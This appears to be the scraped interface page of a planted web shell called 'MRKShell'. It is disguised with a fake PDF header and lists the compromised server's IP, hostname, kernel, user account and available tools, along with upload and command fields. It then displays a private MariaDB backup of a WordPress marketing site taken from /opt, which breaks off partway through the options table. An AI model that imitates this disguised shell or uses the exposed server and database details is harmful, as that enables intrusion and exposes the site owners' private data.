...........................................................................................................................................................................................................................................................................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%PDF-1.5 MRK IS HERE %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY MR K IS HERE
MRKShell
Server IP : 65.108.66.160  /  Your IP : 216.73.217.50
Web Server : Apache
System : Linux srv16.asso.com.ar 4.18.0-553.123.1.el8_10.x86_64 #1 SMP Tue May 5 04:00:43 EDT 2026 x86_64
User : alasaweborg ( 1047)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /opt/burp_mysql_backups/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /opt/burp_mysql_backups/mktinsiders_landing.sql
/*M!999999\- enable the sandbox mode */ 
-- MariaDB dump 10.19  Distrib 10.6.27-MariaDB, for Linux (x86_64)
--
-- Host: localhost    Database: mktinsiders_landing
-- ------------------------------------------------------
-- Server version	10.6.27-MariaDB

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `wp_commentmeta`
--

DROP TABLE IF EXISTS `wp_commentmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_commentmeta`
--

LOCK TABLES `wp_commentmeta` WRITE;
/*!40000 ALTER TABLE `wp_commentmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_comments`
--

DROP TABLE IF EXISTS `wp_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT 0,
  `comment_author` tinytext NOT NULL,
  `comment_author_email` varchar(100) NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT 0,
  `comment_approved` varchar(20) NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) NOT NULL DEFAULT '',
  `comment_type` varchar(20) NOT NULL DEFAULT 'comment',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_comments`
--

LOCK TABLES `wp_comments` WRITE;
/*!40000 ALTER TABLE `wp_comments` DISABLE KEYS */;
INSERT INTO `wp_comments` (`comment_ID`, `comment_post_ID`, `comment_author`, `comment_author_email`, `comment_author_url`, `comment_author_IP`, `comment_date`, `comment_date_gmt`, `comment_content`, `comment_karma`, `comment_approved`, `comment_agent`, `comment_type`, `comment_parent`, `user_id`) VALUES (1,1,'Un comentarista de WordPress','wapuu@wordpress.example','https://es.wordpress.org/','','2022-09-26 17:16:52','2022-09-26 17:16:52','Hola, esto es un comentario.\nPara empezar a moderar, editar y borrar comentarios, por favor, visita en el escritorio la pantalla de comentarios.\nLos avatares de los comentaristas provienen de <a href=\"https://es.gravatar.com/\">Gravatar</a>.',0,'1','','comment',0,0);
/*!40000 ALTER TABLE `wp_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_links`
--

DROP TABLE IF EXISTS `wp_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) NOT NULL DEFAULT '',
  `link_name` varchar(255) NOT NULL DEFAULT '',
  `link_image` varchar(255) NOT NULL DEFAULT '',
  `link_target` varchar(25) NOT NULL DEFAULT '',
  `link_description` varchar(255) NOT NULL DEFAULT '',
  `link_visible` varchar(20) NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT 1,
  `link_rating` int(11) NOT NULL DEFAULT 0,
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) NOT NULL DEFAULT '',
  `link_notes` mediumtext NOT NULL,
  `link_rss` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_links`
--

LOCK TABLES `wp_links` WRITE;
/*!40000 ALTER TABLE `wp_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_options`
--

DROP TABLE IF EXISTS `wp_options`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) NOT NULL DEFAULT '',
  `option_value` longtext NOT NULL,
  `autoload` varchar(20) NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`),
  KEY `autoload` (`autoload`)
) ENGINE=InnoDB AUTO_INCREMENT=188414 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_options`
--

LOCK TABLES `wp_options` WRITE;
/*!40000 ALTER TABLE `wp_options` DISABLE KEYS */;
INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES (1,'siteurl','https://mktinsiders.com','yes'),(2,'home','https://mktinsiders.com','yes'),(3,'blogname','Marketing Insiders','yes'),(4,'blogdescription','Otro sitio realizado con WordPress','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','wp@brotead.com','yes'),(7,'start_of_week','1','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','1','yes'),(11,'comments_notify','1','yes'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','open','yes'),(20,'default_ping_status','open','yes'),(21,'default_pingback_flag','1','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','j \\d\\e F \\d\\e Y','yes'),(24,'time_format','H:i','yes'),(25,'links_updated_date_format','j \\d\\e F \\d\\e Y H:i','yes'),(26,'comment_moderation','0','yes'),(27,'moderation_notify','1','yes'),(28,'permalink_structure','/%year%/%monthnum%/%day%/%postname%/','yes'),(29,'rewrite_rules','a:129:{s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:17:\"^wp-sitemap\\.xml$\";s:23:\"index.php?sitemap=index\";s:17:\"^wp-sitemap\\.xsl$\";s:36:\"index.php?sitemap-stylesheet=sitemap\";s:23:\"^wp-sitemap-index\\.xsl$\";s:34:\"index.php?sitemap-stylesheet=index\";s:48:\"^wp-sitemap-([a-z]+?)-([a-z\\d_-]+?)-(\\d+?)\\.xml$\";s:75:\"index.php?sitemap=$matches[1]&sitemap-subtype=$matches[2]&paged=$matches[3]\";s:34:\"^wp-sitemap-([a-z]+?)-(\\d+?)\\.xml$\";s:47:\"index.php?sitemap=$matches[1]&paged=$matches[2]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:44:\"sp_logo_carousel/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:54:\"sp_logo_carousel/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:74:\"sp_logo_carousel/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:69:\"sp_logo_carousel/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:69:\"sp_logo_carousel/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:50:\"sp_logo_carousel/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:33:\"sp_logo_carousel/([^/]+)/embed/?$\";s:64:\"index.php?post_type=sp_logo_carousel&name=$matches[1]&embed=true\";s:37:\"sp_logo_carousel/([^/]+)/trackback/?$\";s:58:\"index.php?post_type=sp_logo_carousel&name=$matches[1]&tb=1\";s:45:\"sp_logo_carousel/([^/]+)/page/?([0-9]{1,})/?$\";s:71:\"index.php?post_type=sp_logo_carousel&name=$matches[1]&paged=$matches[2]\";s:52:\"sp_logo_carousel/([^/]+)/comment-page-([0-9]{1,})/?$\";s:71:\"index.php?post_type=sp_logo_carousel&name=$matches[1]&cpage=$matches[2]\";s:41:\"sp_logo_carousel/([^/]+)(?:/([0-9]+))?/?$\";s:70:\"index.php?post_type=sp_logo_carousel&name=$matches[1]&page=$matches[2]\";s:33:\"sp_logo_carousel/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:43:\"sp_logo_carousel/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:63:\"sp_logo_carousel/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"sp_logo_carousel/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"sp_logo_carousel/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:39:\"sp_logo_carousel/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:44:\"sp_lc_shortcodes/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:54:\"sp_lc_shortcodes/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:74:\"sp_lc_shortcodes/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:69:\"sp_lc_shortcodes/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:69:\"sp_lc_shortcodes/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:50:\"sp_lc_shortcodes/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:33:\"sp_lc_shortcodes/([^/]+)/embed/?$\";s:64:\"index.php?post_type=sp_lc_shortcodes&name=$matches[1]&embed=true\";s:37:\"sp_lc_shortcodes/([^/]+)/trackback/?$\";s:58:\"index.php?post_type=sp_lc_shortcodes&name=$matches[1]&tb=1\";s:45:\"sp_lc_shortcodes/([^/]+)/page/?([0-9]{1,})/?$\";s:71:\"index.php?post_type=sp_lc_shortcodes&name=$matches[1]&paged=$matches[2]\";s:52:\"sp_lc_shortcodes/([^/]+)/comment-page-([0-9]{1,})/?$\";s:71:\"index.php?post_type=sp_lc_shortcodes&name=$matches[1]&cpage=$matches[2]\";s:41:\"sp_lc_shortcodes/([^/]+)(?:/([0-9]+))?/?$\";s:70:\"index.php?post_type=sp_lc_shortcodes&name=$matches[1]&page=$matches[2]\";s:33:\"sp_lc_shortcodes/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:43:\"sp_lc_shortcodes/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:63:\"sp_lc_shortcodes/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"sp_lc_shortcodes/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:58:\"sp_lc_shortcodes/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:39:\"sp_lc_shortcodes/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:40:\"index.php?&page_id=100&cpage=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:58:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:68:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:88:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:83:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:83:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:64:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:53:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/embed/?$\";s:91:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/trackback/?$\";s:85:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&tb=1\";s:77:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&feed=$matches[5]\";s:72:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&feed=$matches[5]\";s:65:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/page/?([0-9]{1,})/?$\";s:98:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&paged=$matches[5]\";s:72:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/comment-page-([0-9]{1,})/?$\";s:98:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&cpage=$matches[5]\";s:61:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)(?:/([0-9]+))?/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&page=$matches[5]\";s:47:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:57:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:77:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:72:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:72:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:53:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/comment-page-([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&cpage=$matches[4]\";s:51:\"([0-9]{4})/([0-9]{1,2})/comment-page-([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&cpage=$matches[3]\";s:38:\"([0-9]{4})/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&cpage=$matches[2]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";}','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(33,'active_plugins','a:3:{i:0;s:35:\"carousel-slider/carousel-slider.php\";i:1;s:36:\"contact-form-7/wp-contact-form-7.php\";i:2;s:27:\"logo-carousel-free/main.php\";}','yes'),(34,'category_base','','yes'),(35,'ping_sites','http://rpc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','0','yes'),(38,'default_email_category','1','yes'),(39,'recently_edited','','no'),(40,'template','twentytwentytwo','yes'),(41,'stylesheet','twentytwentytwo','yes'),(42,'comment_registration','0','yes'),(43,'html_type','text/html','yes'),(44,'use_trackback','0','yes'),(45,'default_role','subscriber','yes'),(46,'db_version','53496','yes'),(47,'uploads_use_yearmonth_folders','1','yes'),(48,'upload_path','','yes'),(49,'blog_public','1','yes'),(50,'default_link_category','2','yes'),(51,'show_on_front','page','yes'),(52,'tag_base','','yes'),(53,'show_avatars','1','yes'),(54,'avatar_rating','G','yes'),(55,'upload_url_path','','yes'),(56,'thumbnail_size_w','150','yes'),(57,'thumbnail_size_h','150','yes'),(58,'thumbnail_crop','1','yes'),(59,'medium_size_w','300','yes'),(60,'medium_size_h','300','yes'),(61,'avatar_default','mystery','yes'),(62,'large_size_w','1024','yes'),(63,'large_size_h','1024','yes'),(64,'image_default_link_type','none','yes'),(65,'image_default_size','','yes'),(66,'image_default_align','','yes'),(67,'close_comments_for_old_posts','0','yes'),(68,'close_comments_days_old','14','yes'),(69,'thread_comments','1','yes'),(70,'thread_comments_depth','5','yes'),(71,'page_comments','0','yes'),(72,'comments_per_page','50','yes'),(73,'default_comments_page','newest','yes'),(74,'comment_order','asc','yes'),(75,'sticky_posts','a:0:{}','yes'),(76,